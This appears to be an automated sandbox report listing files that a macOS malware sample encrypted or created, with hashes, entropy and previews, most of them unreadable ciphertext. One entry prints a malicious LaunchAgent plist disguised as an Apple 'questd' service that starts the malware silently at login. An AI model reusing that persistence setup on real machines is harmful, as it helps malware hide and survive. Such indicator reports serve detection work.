                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: -..._.....+.}g..........j.....n..!................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/LanguageModeling/de-dynamic.lm/.lexicon.dat.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):5498
                                                                                                    Entropy (8bit):3.632249473286045
                                                                                                    Encrypted:false
                                                                                                    MD5:83C59AFEB412691A29E0DD53BC13096B
                                                                                                    SHA1:E1384B491FF225FC66C4CD74C053C73632D15622
                                                                                                    SHA-256:69915360BC840B4C06763192A09AA81CA4166A9AA658C7892F8F069E5BD5B653
                                                                                                    SHA-512:B1A9678B73181A0D58E3FFE4BF0E94ADB873ED6B040C5766EF55E9A2B5D68CAD74B6FF4EB18E888CE82E4DDD2EBC905333E4ECA84EEF77AE720D0A6EB32E5524
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: B<.........jt.8.......RU.@....Q..................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/LanguageModeling/de-dynamic.lm/.meta.dat.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):570
                                                                                                    Entropy (8bit):6.189571162493434
                                                                                                    Encrypted:false
                                                                                                    MD5:22C717F46F87829BAF616BD7F5FB8C12
                                                                                                    SHA1:4960BD7182E4BDF75BEA14DD2B44EEA774AFB488
                                                                                                    SHA-256:41CA76A0D8A88875C48925151D31792F4537B206FA8DC6B6F58C9D54FE7F8E97
                                                                                                    SHA-512:F69E34B56789C94096CE2D162658D0B856F81AC17378B18418636CC437B2C8FAA2963C5B32FF2231BD565AF01C192CE370B1E0973D735A200C0518C7E852423C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..[.2.q...f..o`...+..P(....y-j...9x..!.kY@...`....|..H....g2Oc......V..>....._........=..R.+V......y-j...9x..!.kY@.....M..Fj...Z..../.v..<}...b...b.$CIH...D...j...S....C..~+t.$"..... =`#X.{G./....\d...L.@.......C..6..C.G.HApl.....|.. ....................vQ.p..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/LanguageModeling/de-dynamic.lm/.tags.dat.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):386
                                                                                                    Entropy (8bit):5.166772820682715
                                                                                                    Encrypted:false
                                                                                                    MD5:6E1F1D149384A8A2BD4986E186C916B0
                                                                                                    SHA1:96D84FEFEE317ACA69809E159F9F3AA86C6F320F
                                                                                                    SHA-256:0A4603560F33810B27C4C8C47277174055DD9F4951C6523585D0556C43C00DCE
                                                                                                    SHA-512:C8E986A02D8243DB43D3DA9FBE63591ED8A3121052AF11EA63BC020FD4B3AEA8AE95E3457A002577D49F30460CB2BD82017D88E4447DB255350CB77D9DF3086A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....V...N..qX..(..9.....:.?...|bR......M2........p.........07.b..y.........Q................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/LanguageModeling/en-dynamic.lm/.dynamic.dat.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):338
                                                                                                    Entropy (8bit):4.691457002587016
                                                                                                    Encrypted:false
                                                                                                    MD5:F40C1999C8D24010CFDC830C29935F10
                                                                                                    SHA1:325E4A15748724837AC03493A6E6B89CA6A05381
                                                                                                    SHA-256:825E6D00EAABA4B44730DCB9EFE3C69474EBB49ADAF7C53C9A559077B6A9647B
                                                                                                    SHA-512:02ABD7E55BC3D9FA99A66DD3E120FE5EDD0E9BA4564EC077918782BF3F78350E66C1688901F182F512C59E8FABAC27330DE331BC6394EC4D6921CE558DA6B31D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: -..._.....+.}g..........9.....:..!................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/LanguageModeling/en-dynamic.lm/.lexicon.dat.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):5498
                                                                                                    Entropy (8bit):3.632249473286045
                                                                                                    Encrypted:false
                                                                                                    MD5:83C59AFEB412691A29E0DD53BC13096B
                                                                                                    SHA1:E1384B491FF225FC66C4CD74C053C73632D15622
                                                                                                    SHA-256:69915360BC840B4C06763192A09AA81CA4166A9AA658C7892F8F069E5BD5B653
                                                                                                    SHA-512:B1A9678B73181A0D58E3FFE4BF0E94ADB873ED6B040C5766EF55E9A2B5D68CAD74B6FF4EB18E888CE82E4DDD2EBC905333E4ECA84EEF77AE720D0A6EB32E5524
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: B<.........jt.8.......RU.@....Q..................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/LanguageModeling/en-dynamic.lm/.meta.dat.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):634
                                                                                                    Entropy (8bit):6.443234693703587
                                                                                                    Encrypted:false
                                                                                                    MD5:41C2C3546808306D786F2A5F1301686A
                                                                                                    SHA1:FD697AFB6E76A7C611EE0EE0D767349CDAC66C19
                                                                                                    SHA-256:994D9B5ED9F076C1E2432BF42CE468C9D996CF6D28A5FA34548A9DA2236A2D86
                                                                                                    SHA-512:4BAE1745BB58879E4EBAB15DA2C6A8B78785CE226316C98C8B5CCA98EC058F86E1A392F785309274A8E3B129AB1FDF370BFBA46A5DD9D23EFD8FE0BDDCD459EE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..$Z.:/...?.l...+mW....J....C..N.Vpv.Z..{c.9.K.W%&.....&..b.lZ..7.6@..+Y...`......C...V#..5D]v<S.G...t:...K...h.n...E.._..Gb.....mx..!.kY@dSz..B...tI.Z..*o.j)...X.......5m!bW...9Km..;....&7.x.s_m.o.g*.......y._o......0zW...*JD...!wGT......a...H32..9."...N.`..z.'?..'.7Csv.Df...O.G..:...B...m.....}.'=W..#.L.........G.4...5.I................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/LanguageModeling/en-dynamic.lm/.tags.dat.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):386
                                                                                                    Entropy (8bit):5.166772820682715
                                                                                                    Encrypted:false
                                                                                                    MD5:6E1F1D149384A8A2BD4986E186C916B0
                                                                                                    SHA1:96D84FEFEE317ACA69809E159F9F3AA86C6F320F
                                                                                                    SHA-256:0A4603560F33810B27C4C8C47277174055DD9F4951C6523585D0556C43C00DCE
                                                                                                    SHA-512:C8E986A02D8243DB43D3DA9FBE63591ED8A3121052AF11EA63BC020FD4B3AEA8AE95E3457A002577D49F30460CB2BD82017D88E4447DB255350CB77D9DF3086A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....V...N..qX..(..9.....:.?...|bR......M2........p.........07.b..y.........Q................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/LaunchAgents/com.apple.questd.plist
                                                                                                    Process:/Library/mixednkey/toolroomd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):423
                                                                                                    Entropy (8bit):5.149518685597818
                                                                                                    Encrypted:false
                                                                                                    MD5:7C40116AF40BF3E73C902434FF54FB3B
                                                                                                    SHA1:F1E7D13003F9BE235D29F0DE60743CF56643E0C6
                                                                                                    SHA-256:95579AFC0B49F020BA9B1FB6E59C4DC80E1F09638F0F3F35725F009D02472E88
                                                                                                    SHA-512:F9FA962543D80C8C11F43841B69D74EAAD466D84122CA48AA2BBA7F7C2A6ACD360227D0DF05D5F70F7B67C793BB892B503870D7150DA364DBDDB69DE1AB7CDA0
                                                                                                    Malicious:true
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>.<key>Label</key>.<string>questd</string>..<key>ProgramArguments</key>.<array>.<string>/Users/ben/Library/AppQuest/com.apple.questd</string>.<string>--silent</string>.</array>..<key>RunAtLoad</key>.<true/>..<key>KeepAlive</key>.<true/>..</dict>.</plist>
                                                                                                    /Users/ben/Library/Logs/CoreTelephonyTraceScratch/CSI.scratch/.0x00000000-csi.txt.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):65877
                                                                                                    Entropy (8bit):7.980626367262755
                                                                                                    Encrypted:false
                                                                                                    MD5:AA844D7177AD170979DC4625C81D16EA
                                                                                                    SHA1:3C6CFC7A75DE4EE6B70111F98D704AA755D49C38
                                                                                                    SHA-256:985F727C5CE429B4185DA4B57B6373BD1F0ACC9B4741AE8FB93AAEC8C7178DE8
                                                                                                    SHA-512:0E3982CFD865BF291206267FFBBB9B8683E20918211243D06B304394D51529EE166E297C78ACFD5EC5906A580A49815873378629EE66C57CF8C5E5BFBB296729
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: hR1._]B...... ..G..,......2....yL........).-.R.yF.....C`..N..w.....'7#j.U@\.....o.=i.I7z....l..........}..'....Q.]..3...NV...=...4......1.M....[R../......R......l...[C L...&.7...s.oq...........)t.B...`.....h.].}.i...6.........?...'.G..B.c....G.......|.h.D.j.#......<.......y.f.!EK..y....N.L.<..4.6.Q.l..o..~...~..L.K.*.@0.....Z.~.......x...{.....7..\..U.w.-b....4.f.p\_%.....'..X....f~........*.=..%n@@;n.O.S.....#..C..\{RA...k...w......B..ksc......'".q.w.....J...C....~.[wn..._C.......P.........WN6U_.....%.h......\EK./Q._.nf.w...]sZa,U:3......4>.x.<.|u.z..z.C..}...)&}.d..F.....Fm..kX..%.z...D7..N.......$..y..m.......SmD..t..l.l.\Hj..[I..$.8..............;E.....g...Q"2...o..w....?o.1.........z...v|.....-...k....%./.j.#.....b}...C..........>>).`.Z.....w...y.#..=7..l.....GD...^..`.Y.s...6'.T*.M...$......9'o.........<......lj.-r..Z...]^*........v.,9..h...b.50.H.\...q.._q5i'....H...|AO.6gZ.Rj.......AeJ.5`..N.%....p_7;XR/),....A....s.3.x..HO..F9.......5..H..~..GI..>5Z._.`d...f...s ..o.a",&......
                                                                                                    /Users/ben/Library/Preferences/.com.adobe.crashreporter.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):642
                                                                                                    Entropy (8bit):6.504522573300987
                                                                                                    Encrypted:false
                                                                                                    MD5:1A1D8AC5512BFEA77D7C573359E9A628
                                                                                                    SHA1:A6365C56739E591CBA55007D230BF79B648A3E36
                                                                                                    SHA-256:6ADE0DAA02F146567923220631C71EA94F4DE47AFA06833AAEA59F656D71589C
                                                                                                    SHA-512:A2CA1DCFBF92A64968738CCF358A3B10939FBAD3EBFB8538CBFC74C4F030E772C392D761ADD7BA8ED0DD6CEB8905DAA8756E2382E8ACB0B37E279D35148D3693
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..B.Y...aIf.........7.?P..|.X...J+.S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:.......'/.x.s...S.....?E..v....pa.....S..X.......=......;.wTM.U..x.Zc.o....DW.`..*..}...C..Z.e[..X?....FA.Ua.._:B..k~.:..HR4Ldj.,.G......RyhO....;.^..7-g.g...5.....0...Q................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.CallHistorySyncHelper.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):354
                                                                                                    Entropy (8bit):4.898976856316621
                                                                                                    Encrypted:false
                                                                                                    MD5:057F6F2AAF18A3AE83491B9B05DF851B
                                                                                                    SHA1:85DC406FF6E233127ED60314F64E5364485E7CEF
                                                                                                    SHA-256:0FDF33BBC960D4C4B676933E48714FA370F4B5174ACE07224BB920A0D17FD520
                                                                                                    SHA-512:0E317D488EE2E53A1BAAA08B752A274127F75C98FE12667EF2355A13F2F966E379653078D9479A92D902D0E34B096A74DB856956333BBA410EFE1EB13BDFC4CF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..t....M.I....|.. P...]..?...........;.et>.1................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.CharacterPicker.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):418
                                                                                                    Entropy (8bit):5.450071492766009
                                                                                                    Encrypted:false
                                                                                                    MD5:8D3DB7B226EC816C4A82C65C9F7C55F7
                                                                                                    SHA1:521E2639612C4D8EE5ED1F27A047C306343C3A75
                                                                                                    SHA-256:798BB063727F5A9DF507D370359A68CEBD052D038084316E74EEFFC04A858596
                                                                                                    SHA-512:733CFD73559B6B9091910681F03EF37CB37462217021B32C22D8D5CB11C9B0C26C19BB7763ABEE5F074F85060E04D44CA9DAB7DE1511243392F2FE02C1438284
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....m..o.a...P...%A%.....V'..`I..]...W...6A.......Un...N.t2Xe.......,2D(....m...#<(y.....Q..........'.Z.<#.q................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.CommCenter.counts.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1130
                                                                                                    Entropy (8bit):7.2159118332620995
                                                                                                    Encrypted:false
                                                                                                    MD5:40EAD139D5E5748416E8FF76A2EC07AB
                                                                                                    SHA1:AB596BE2FC996CC23003246314C5C06984919E70
                                                                                                    SHA-256:1717AC0A0B10B3F5604EF6B965FFA5D58CFBCB30537DC2FA821D126898B799EE
                                                                                                    SHA-512:150A2EF2CBBBD6401FD3F661F13D9AC841662D5A313579F6DD7AB78202D6BA367EBBF4F150D1E943E986AA22CEFEB462743676A566642A97A8EB7D9C0C791B20
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....L.2..~...a...+.........M`S0..........w..].V..6.Bt...(<u-....G....S.<.....;qT!n...(..-..-..z.......M\nfj..... .r..m.*..m...s.6..,=J...8...G...o.._.XK........-.|.zi.v...p.s.n...-..z....=.2..NO...61S.1....c=.W......y..s..QE.......=T.....u.B.;.[p..q.,....CB.^*...]...9:........(..-.96..!.$....)..%IS....u.=3.-.8...^h_[.s_.,.]...i.....6.8xS......q..u........6..4.+.C.k..!.O.$....S .L.3..g&..Qw.#.}>.......b......`..A17.MV..(.Y.......k..zCvG....R...=.5`v.8..$p....w.+.D$2..[.8Y....07...i.R=..........,.aD...fo.C.+.&.S......q...Zv..`.x.R../tx..u|Q...5%R..O.WcWc@...E..Ph../*P........i.R=...o.o..I..lM.LD..o.C.+.&.S......qh..r?.........k..zCvG..........a`v.8..$p....w.+...A../...eq?.i$22.e..".......|..............ZM......C..T/s....Q.. ..F.\'e.0G.......,[....[.`l..%e.q[7...-$?".$..u...f.......\...-u....ta%R4,.....p....s..9................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ...................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.CoreGraphics.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):418
                                                                                                    Entropy (8bit):5.42461173834195
                                                                                                    Encrypted:false
                                                                                                    MD5:ACAC0747AB55B19BB10F778C15131262
                                                                                                    SHA1:E4AE059A963D5C7FB370DEC035AC841831591F1C
                                                                                                    SHA-256:0660851B0DC229DA10F26FD68746675DA45EF88AAF6BCA34F3B25481A4D3E398
                                                                                                    SHA-512:186C71AF727E874499D42852F2835850CD7B683B1C35C6B7D7AB1988CBEC4C275D0B185D48B27DF9333EFB792E23366084FB1DC786D5314A835FF868560D345F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..3...[..1...0[.K[...E..:..=.-p.0..o.Y...}X.....R..j.#z......L.........M2..X................g.J..=.......2.q................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.HIToolbox.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):778
                                                                                                    Entropy (8bit):6.800097224392833
                                                                                                    Encrypted:false
                                                                                                    MD5:0D2F22F590BBE380B78756E938FAA7DC
                                                                                                    SHA1:4A39B7160724A364D5D69D58E23AE119FC89BCD1
                                                                                                    SHA-256:79BEA414CD91E2FD075D45B1143395E06CA8F62E912023670FAB0BA269ABCEF3
                                                                                                    SHA-512:6C18F0D99FB7D2C47F3F616B7B7330BE44A0E2249FEA03656A7DADFFB1AED6076475DCD18F1E93A9A762ABFC97DBC0371A98A1C27CCEA64B525817BCB87E8D83
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...........i.!.h..;.]%.L..=.?...=..B.........W.......?P.p..*...hN..[..&.|h.!...~. ....'..J.,..:.c..r..6...k...j..d..v3?xH.=.?...=.P..........i{`..3.+.........6.....)ctwR._..[....1.O....)......4..e....sc..7.v.6I...M...Vl3.w[56.ub..2.(W"5...=....=L...s.u.(2.|..MN.z>.....i{`....-G..r...v..<.G"....}......\.k.&..........P3..a..d."...j`/....=.U.M.......`.....QX.k.....US...H....!k........./..N........4..!..k.sg.~.....a..y.......&y.T....6B...*LL..J2..............=..H.....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.KeyboardViewer.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):506
                                                                                                    Entropy (8bit):5.963475291903935
                                                                                                    Encrypted:false
                                                                                                    MD5:6D1164E19E896EA467993D7094DFC51E
                                                                                                    SHA1:B0547BAA12921E69BC5074DC06CFEEFCF15B6B27
                                                                                                    SHA-256:6E854F229CEAAB9EA55ED099FA585CDF8358859248A36B5139CB2C6DB4CAAF8D
                                                                                                    SHA-512:F69E00A782EBD521DD004D61CB4BFDEEC034A26453D7F3C9A81EED719AC795347E23E7762CEDE80491AA00AC18189E6A641FFF7CC97DFD3BF4E45BAC607904D2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9...i.).....i{`....|...M..?.q..ie....{`..;...$..N..E$S.y. A..oA..T...T.#...\I$...xl.....0..g.R,...........>.\..Vf.u..T...V.:.....Z.*..........D..bu.?..c.h...7.........r.........1V.....n..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.Maps.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):642
                                                                                                    Entropy (8bit):6.528836655036869
                                                                                                    Encrypted:false
                                                                                                    MD5:8AED170E1F14952DD76D05DA859D701E
                                                                                                    SHA1:52EDACE2548CE47BF887686BA44D7C5FF2B287BE
                                                                                                    SHA-256:B60756263D84E3D439EFC9FFB77CB186BFC263E5FA15E9CE7D86BA055AF2BC81
                                                                                                    SHA-512:1128BDD6B5B4B2C294CDA3480E8060A9FC2645983600EF80E884B53EA65E0CB7BDD2CB96CED5559D30643FB1EE9764B1E714666F13478BA5E9B3F4217EE6AF36
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....m.~.Y.t.."m..y..`9D?.m.1.D6...C..0......E.,.3t<...z @.3........\.e<..5p.:n..;......x..c........V.B.....(.....L...=....E....H......... Q..V.....u./E...'..W.c...]..'D%.....CX'...../.N;j..qZy..H.:...48.......D.`%....'.?.,iM.eC.P..{.'{.P8.....x....m.-"j\....dYR;.K..*.....b......uo...<8-.H.l...........\.....#p}9..{...#Rox......t..Q................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.Messages.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):410
                                                                                                    Entropy (8bit):5.337249881934413
                                                                                                    Encrypted:false
                                                                                                    MD5:ECDCD3953D30485CBE8A8E91F4668146
                                                                                                    SHA1:473A4C82C66578161E5E993A104E811F1EEA3666
                                                                                                    SHA-256:19B6A8358E5DEB50ECA20303FBF4ACDC7F90956B13D37D32C565A33850AD46B6
                                                                                                    SHA-512:49F8B43E8ED01AF1F868DB2D0B724B16C70D97DF54CFF087CEA6E72C02991CE702CFE6FD1823034C5AF11C27DECF00E29F40571800BE9ED9D0A8D16EC87C6582
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R.......J..pw.y..(.b........@]....o.,..<..h.LN...&0|.R_....S.Xq....{*..T.....~...yn........Y.....g..i................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.PubSubAgent.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):386
                                                                                                    Entropy (8bit):5.149857470908154
                                                                                                    Encrypted:false
                                                                                                    MD5:13021661FE226BF7906965FF31BF48A4
                                                                                                    SHA1:7A5A803729F39E2BA8E19D25F280137B3A79A4C6
                                                                                                    SHA-256:F2841BBA80BA73F731DB3A5BCD58B0C1866CDEE47549832A79ACA16990E19E10
                                                                                                    SHA-512:C0E5E74CA9BD2B2E2A89DDA70C5A5E73B461DF5DD34596968356DE0BE07D61D18ED389F04431815A5A6A45130603EE6A437FF3CC00D916C3F89238C302C1E727
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....`....@V*.3zt..M.r..........q*......_{L....\.....G;.Z.Q........1......o.Q................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.appstore.commerce.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):378
                                                                                                    Entropy (8bit):5.0773705439905905
                                                                                                    Encrypted:false
                                                                                                    MD5:FA9D4A081E4B9848F42757AF510A0EF1
                                                                                                    SHA1:AC184A2C36F6DF519CBE05783D653279EF1C367E
                                                                                                    SHA-256:92942706056089E7A13E10D0FAFC5E4D8DFBC5BD7ACC8F016604AD2ED4A6F165
                                                                                                    SHA-512:E693C4A6C8AAA9B878ABAAA198FAF3A697E60CE2F0C2D07FE70C341A70CE68D3B72B9A65C67574FC9393569F8B074C4C71A19EE581B67D5FEEFBAD8FFA33D8E3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....X.pHC2..cg....5..[T..y.7p*.J.(s.T..\.!..p.e&...........bV7.....I................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.calculateframework.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4074
                                                                                                    Entropy (8bit):7.861175961889266
                                                                                                    Encrypted:false
                                                                                                    MD5:6A5E219D61D0B4E44B8BE3DAF339262D
                                                                                                    SHA1:120770656AB18B2C75E1EF9673BE17B6690794FF
                                                                                                    SHA-256:03E160554A082CDC97E5416CAC25F122AC76A55CFD0931B8E3889D3E266C3665
                                                                                                    SHA-512:4E9FD785489BD361DB122123B701D092D9AAC857CA80E6380FDA197CCC6A1F9FEF700CCD956C6F45A106A97417108A0876FAE2F1EE31183F1531D1C3BD3778F1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R.........I...h..\/z......Q....]E-.&|Na...O_Y>..U.QKC...........{......<y.........S..#..oKe!.gt._(.r..P.=...x..@.%.+gxp....B. =..........j......%....L.!*H..U.~...t.^........m......c%....5M.{/)S....b...P..i......X.z.;.{...eI...G.(.3./...K.h..g..t.l..*j.k....[.G..x..D.....fI.@(...Opc.;.....G....8..8f5....%q..<cA.........jCZ....$..%<.XT...V......^.8.\g..3..r.+....T..Y....cN/.v..B.d.`...\]..R.....(...|o.|......o|V{l.l...6......[..j....A...c_/..0O.......A.8....t.4y..._...U^]...$ .....t...@.....W...y.1.|!.18..H.....%..W<.Y~.....D&[!z...9.h,.E......O#...AH...y$R..@&hG....V..NM*..v......e......#`........Ks1z.?..:....3[.W.Z.T....vTMx.W..z...q.....{H../..{P|...F...d...{!.......)...y;..|..m.$. .)'j..c..I........w...%t.....f...../...p....U...Z)./.BR|..l....[ ..........z._......*..$..G..I...<@;...m........2..D...5......V.^......].....oK.1.z...M...u..N.mST......U..[.z.<.......4.:%2..i..` .a.-...1.r?&...,=.2O.......U#.8...(.......?..Me.................f .V........_.D.0x...S.2tH..F........._..g..
                                                                                                    /Users/ben/Library/Preferences/.com.apple.classroom.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1290
                                                                                                    Entropy (8bit):7.1899319182328965
                                                                                                    Encrypted:false
                                                                                                    MD5:79FE0D21BA1E93D654A760EE5DFC7BBF
                                                                                                    SHA1:5DB62748A932FDCB28F46ACC7CC42B3B06E192F6
                                                                                                    SHA-256:857C2A99527C612CF5C30241CFE937848012F5AC378BC70DC19FDC63BDC173A1
                                                                                                    SHA-512:A11A11D6E132D4467A5904B89957975C1FA0C98B8196F856961BDE941A08A895AB7C0B447066AE95913B5EF76B2728329A8B77DD0541F9FAE5E099BBF4A47DF7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
